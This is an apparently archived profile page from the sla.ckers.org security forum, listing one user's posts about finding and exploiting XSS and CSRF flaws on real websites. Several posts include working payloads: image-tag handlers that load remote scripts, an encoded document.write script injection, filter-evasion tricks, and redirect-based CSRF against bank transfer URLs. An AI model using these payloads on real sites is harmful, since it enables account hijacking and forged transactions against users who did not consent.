sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 26 of 26
5 years ago
ted
Hi all, I found a site which uses something like UBB to insert an image. However, the < and > were not allowed. Yesterday I found the "onerror" could work, but now, it was filtered. I'd tried another 2 event handlers of the image tag: onabort/onload, but they couldn't work. I am not sure to replace an "onerror" to blank to something else would be safe.
Forum: XSS Info
5 years ago
ted
I want the firefox 3.5 version
Forum: Projects
5 years ago
ted
hxxp://www.devco.net/archives/2008/05/04/designing_a_single_sign_on_system_-_part_3.php However, the author didn't tell us all the detail. I am looking for an open source like that.
Forum: Projects
5 years ago
ted
I had tried cygwin, but failed: $ touch.exe \<img\> touch: cannot touch `<img>': No such file or directory
Forum: XSS Info
5 years ago
ted
Hi all, I had read RSnake's book, and I know I can create a share in Windows 2000 that contains the characters <>. I had tried to export: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares, but my file is: Windows Registry Editor Version 5.00 And I don't know how to change a file just like foo.txt to <img>.rar Thanks in advance.
Forum: XSS Info
5 years ago
ted
.mario Wrote:
-------------------------------------------------------
> That only works on IE - this way it works on most
> other browsers too:
>
> <img src="x" onerror="with(document)body.previousSibling.appendChild(createElement('script')).src='//&#331;.ws'">
>
> String.fromCharCode enables having all the fun
> even witho
Forum: XSS Info
5 years ago
ted
I got it <img src=javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://www.a.com/m_2.js%22%3E%3C%2F%73%63%72%69%70%74%3E')>
Forum: XSS Info
5 years ago
ted
I found the <img src=javascript:alert(/xss/)> works well, but I can't find a way to make a remote js work in it, I've tried: <img src="javascript:src='1.js'"> but failed. Thanks in advance.
Forum: XSS Info
5 years ago
ted
We got a flash game project from a third-party company, and we had the source code of the actionscript3.0. Once we compile it and make it work, our users would play the game in their browser. I am afraid that the flash will send our users' information to their third-party server in the mean while it contract with our server. Maybe it would send the user's information via TCP/UDP, so Firebug can
Forum: CSRF and Session Info
5 years ago
ted
Are there strategies to make the ActionScript 3.0 not easy to understand by humans even if the crackers decompiled it by some tools like Sothink? Thanks in advance.
Forum: OMG Ponies
5 years ago
ted
Ok, you know that simulating a user who is playing the web game is an easy job. The robots just need to send some HTTP requests, for example: hxxp://web-game.com/api/add.php?arm=1&army=other I've thought about adding a key in the request, and the key will be generated by the ActionScript, but once the crackers decompiled the swf file, they will know how the key was generated.
Forum: OMG Ponies
5 years ago
ted
Hi all, there are so many web game robots; actually these robots will not only add to the payload of our web server but also increase the bandwidth. Yes, I know and am familiar with those QA tools, and maybe that's not the place for such a topic. But I really want to deal with the game robots, thus we can 'kill' Robot... So I need some help...
Forum: OMG Ponies
5 years ago
ted
I found Firefox's Tamper Data addon can just tamper the POST data, but cannot tamper the GET data, and I just want to tamper the GET data. I can't paste the changed URL in the browser because it's a request from Flash. Any way else?
Forum: XSS Info
5 years ago
ted
Kyo Wrote:
-------------------------------------------------------
> use a slash instead of the space

thanks a lot! :)
Forum: XSS Info
5 years ago
ted
Hi, all. I found an XSS vulnerability in an SNS web site. When I typed <u>a</u> in the message box, I echoed a letter 'a' with an underline. However, when I typed: <img src="javascript:alert('xss');"> it echoes: <img&nbsp;src="j**ascript:alert('xss');"> Well, the word "av" was a sensitive word in this site. So I use ja&#x09;vasc
Forum: XSS Info
6 years ago
ted
I found this string could make the page show nothing: <!-- :P
Forum: XSS Info
6 years ago
ted
Hi, all. I found a site which may have a persistent XSS vulnerability, but I can't find a way to do it. I type this string in the board: <u>xss''"!--</u> The source of the page was: <SCRIPT LANGUAGE="JavaScript"> ... var base=...:{"enable":1,"content":"<u>xss\'\'\"!--<\/u>"},... ... </SCRIPT>
Forum: XSS Info
6 years ago
ted
The firefox plugin tamperdata is wonderful, I am wondering if there is the same software for ie?
Forum: XSS Info
6 years ago
ted
I knew this from: hxxp://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html Does anyone know the details about this? I want to know how I can improve my web applications to continually check and filter these hybrid files. Best regards.
Forum: CSRF and Session Info
6 years ago
ted
Thanks Awesome, it works!
Forum: CSRF and Session Info
6 years ago
ted
Thanks so much, I found that many websites couldn't realize the CSRF attack in this way, and use the GET method to request the data. But in some cases, they set the user id as one of the parameters, such as Quote Redirect 302 /a.jpg http://www.somebank.com/transferfuns.php?user_id_from=1231&user_id_to=2221&count=1000000000000 That means one picture can only attack one person, I am think
Forum: CSRF and Session Info
6 years ago
ted
I was trying to construct an XSS attack in this page, since I couldn't find any filtration on user-supplied data. However, I want to know if anyone could insert malicious code into that page.
Forum: XSS Info
6 years ago
ted
I have seen that many web sites have options that allow users to enter data and then receive an updated dynamic display created according to their input, and I found some of them are susceptible to an XSS attack. In most cases, we should end the original tag before we can construct a URL that has exploit code, such as this: Quote http://www.somesite.com/search.php?key=</td></tr><sc
Forum: XSS Info
6 years ago
ted
I found an interesting function in a forum like this: Quote String.prototype.escHtml = function() { return this.replace(/[&'"<>\/\\\-\x00-\x09\x0b-\x0c\x1f\x80-\xff]/g, function(r){ return "&#"+r.charCodeAt(0)+";" })\ .replace(/\r\n/g, "<BR>").\ replace(/\n/g, "<BR>"). \ replace(/\r/g, "<BR
Forum: XSS Info
6 years ago
ted
Hi, all. I've been trying CSRF for a while now, and am surprised at just how many sites are vulnerable. In the "Cross Site Scripting Attacks: XSS Exploits and Defense", page 111 tells: Quote " ...... This is an example Apache redirection in the httpd.conf or .htaccess file: Redirect 302 /a.jpg https://somebank.com/transferfunds.asp?amnt=1000000&acct=123456 ...... "
Forum: CSRF and Session Info
6 years ago
ted
If the site echoes back user supplied input into a <script> and </script>, I think I will try to use String.fromCharCode(60) and String.fromCharCode(62) to get around it. But if it just echoes back into a Quote <marquee scrollamount='1' scrolldelay='120' direction= 'UP' height='155'> <font color=""> ...... some content with &lt; and &am
Forum: XSS Info